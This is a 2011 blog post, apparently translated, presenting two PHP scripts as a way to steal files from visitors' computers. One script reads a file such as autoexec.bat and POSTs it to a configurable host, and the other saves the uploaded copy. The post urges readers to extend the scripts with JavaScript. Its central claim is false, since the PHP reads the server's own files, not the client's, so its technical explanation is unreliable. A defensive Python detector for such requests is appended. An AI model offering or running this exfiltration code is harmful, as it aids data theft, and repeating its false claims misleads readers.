Monday, May 16, 2011

Dangers of stealing files on the client computer using a script



Before I explain the title, I ask that what is practiced here not be used against other people. If you practice it with evil intent, that is not my responsibility.
Okay, back to the topic. You might not suspect that someone could have plans for the data you store on your computer. I do not need to call a shaman and stay up all day waiting for the shaman to finish his work, he .. he .. he. Did you know? With the following PHP script, files on the client computer can be taken easily and tucked away on your server. It is enough to trick the victim into opening a site that has this script inserted; it will then automatically send (upload) the file to the path on your destination server.
Here's the script:


1. First file
<?php
// This script is written for those who understand PHP
// File Name: ScrCuri.php
// Function: Sends the file to the server
$host = 'localhost';
$port = 80;
// Change the path variable to the location of upload.php
$path = '/upload.php';
// Change the variable $fileku to the file you want to take
// (file() below reads it from the filesystem of the machine that executes this PHP script)
$fileku = "c:\\\autoexec.bat";
$content_type = "text/plain"; // MIME type of the file
// Start Header
srand((double) microtime() * 1000000);
$boundary = "---------------------------" . substr(md5(rand(0, 32000)), 0, 10);
$data = "--$boundary";
$content_file = join("", file($fileku));
// One multipart part: part headers, blank line, file content, closing boundary
$data .= "\r\n" .
"Content-Disposition: form-data; name=\"fileku\"; filename=\"$fileku\"\r\n" .
"Content-Type: $content_type\r\n\r\n" .
"$content_file\r\n" .
"--$boundary";
$data .= "--\r\n\r\n";
$msg =
"POST $path HTTP/1.0\r\n" .
"Content-Type: multipart/form-data; boundary=$boundary\r\n" .
"Content-Length: " . strlen($data) . "\r\n\r\n";
// End Header
$result = "";
// Open Connection
$f = fsockopen($host, $port);
fputs($f, $msg . $data);
// Get the response + results
while (!feof($f))
{
$result .= fread($f, 32000);
}
fclose($f);
// Print results
echo $result;
?>


2. Second file
<?php
// File Name: upload.php
// Function: Catches the request that was sent and copies the uploaded file

// register_globals no longer exists, so read the temporary upload path from $_FILES
$fileku = isset($_FILES['fileku']) ? $_FILES['fileku']['tmp_name'] : '';
if (is_uploaded_file($fileku))
{
// Change the variable $namasimpan to the storage file path that you want
$namasimpan = "/backup_backup_backup/test/autoexec.bat";
copy($fileku, $namasimpan);
// Show results
echo "OK";
} else {
echo "Failed to copy file >> '$fileku'.";
}
?>


Well, after that, save your scripts on your server / host. Then, to prove it, try accessing the scrcuri.php script. Ex: http://bloganda.com/scrcuri.php. Remember! The configuration must match ... to make it easy, just save both files in the root of your server, so that the upload.php file is accessed at http://situskamu.com/upload.php. Understand already ??... Yep ... I hope so .. he .. he .. he. Try accessing the scrcuri.php script in a Windows environment ... what happened? Wowww ... an autoexec.bat file has been slurped onto your server, that is, taken from your client computer as an experiment.
Before you feel satisfied, you should know that the script above is not perfect (so do not be satisfied .... yet). Want to know the shortcomings ???.. Yeahhh ... I know you know too, right? As we saw in our experiment, it can only retrieve one specific file, which the target computer does not necessarily have. Suppose the file is written as c:\tomero.gif; not every computer will have a file like that. So, the solution .. just add a bit of JavaScript and adapt both scripts above ... You know how, right .. of course you do. If not, take it as homework, or learn PHP first, a looot of it if necessary. Still can't? Then the most you can do is just copy-paste ... "Basically lazy" ... he .. he .. he ..
Finally, once again ... what is done with everything in this post is in your hands. I only write and develop ideas with the intent that you be careful in the world of the Internet, although it is rather fun ... Sorry if there are errors or things that displease you. Thank you.
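
A defender's view of the request that ScrCuri.php builds, as an added example that is not part of the original post: the script sends an HTTP/1.0 request line, no User-Agent header, and the full local path in filename=, whereas current browsers send only the base name of an uploaded file. The function names, the finding strings and both sample requests are constructed for illustration.

```python
import re

ABS_PATH = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\|/)")  # drive letter, UNC or POSIX root
FILENAME = re.compile(rb'filename\s*=\s*"([^"]*)"', re.I)
BOUNDARY = re.compile(r'boundary\s*=\s*"?([^";]+)', re.I)

def scan_request(raw: bytes) -> list:
    """Return indicators that a captured multipart POST was built by a script."""
    # Line endings are normalised for matching only; do not reuse the body afterwards.
    head, _, body = raw.replace(b"\r\n", b"\n").partition(b"\n\n")
    request_line, _, header_block = head.partition(b"\n")
    headers = {}
    for line in header_block.split(b"\n"):
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip().decode("latin-1")
    boundary = BOUNDARY.search(headers.get(b"content-type", ""))
    if not request_line.startswith(b"POST ") or not boundary:
        return []
    findings = []
    if request_line.rstrip().endswith(b"HTTP/1.0"):
        findings.append("HTTP/1.0 request line")
    if b"user-agent" not in headers:
        findings.append("no User-Agent header")
    for part in body.split(b"--" + boundary.group(1).strip().encode("latin-1")):
        part_headers = part.partition(b"\n\n")[0]
        for raw_name in FILENAME.findall(part_headers):
            name = raw_name.decode("latin-1")
            if ABS_PATH.match(name):  # a browser would send only the base name
                findings.append("absolute path in filename: " + name)
    return findings

def build_sample(version, extra_headers, filename):
    """Constructed sample request (not captured traffic)."""
    b = "----constructed123"
    return (f"POST /upload.php {version}\r\n{extra_headers}"
            f"Content-Type: multipart/form-data; boundary={b}\r\n\r\n"
            f"--{b}\r\n"
            f'Content-Disposition: form-data; name="fileku"; filename="{filename}"\r\n'
            f"Content-Type: text/plain\r\n\r\n"
            f"@echo off\r\n--{b}--\r\n").encode("latin-1")

SCRIPTED = build_sample("HTTP/1.0", "", "c:\\autoexec.bat")
BROWSER = build_sample("HTTP/1.1",
                       "Host: example.test\r\nUser-Agent: Mozilla/5.0\r\n",
                       "autoexec.bat")

if __name__ == "__main__":
    print(scan_request(SCRIPTED))
    print(scan_request(BROWSER))
```

Each indicator is weak on its own; the absolute path in filename= is the most specific of the three, and all of them are worth correlating with unexpected outbound POSTs originating from a web server.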
